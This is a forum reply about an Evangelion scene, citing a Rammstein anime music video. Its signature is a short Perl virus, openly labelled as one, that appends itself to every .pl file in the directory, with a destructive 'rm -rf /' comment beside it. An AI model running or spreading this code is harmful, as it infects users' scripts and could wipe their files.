Re: Evangelion 04
Scripsit illa aut ille Richard Liang <>:
> Rudolf Polzer wrote:
> >>Asuka, right? How did you generate this?
> >
> >It's the famous "screen-yell" scene.
> Er, which is this scene? I still can't see it! :(
It's the scene where Asuka yells into the image of Shinji and Shinji
retreats as visible on the screen.
Since an AMV is shorter than an episode, I'll refer to that:
Kevin Caldwell's Rammstein - Engel AMV, 02:22,
"Gott wei$(D??(B, ich will kein Engel sein!"
(in the English version of the song: "Goddamn not an angel, when I die!")
#!/usr/bin/perl -- WARNING: Be careful. This is a virus!!! # rm -rf /
eval($0=q{$0="\neval(\$0=q{$0});\n";for(<*.pl>){open X,">>$_";print X
$0;close X;}print''.reverse"\nsuriv lreP trohs rehtona tsuJ>RH<\n"});
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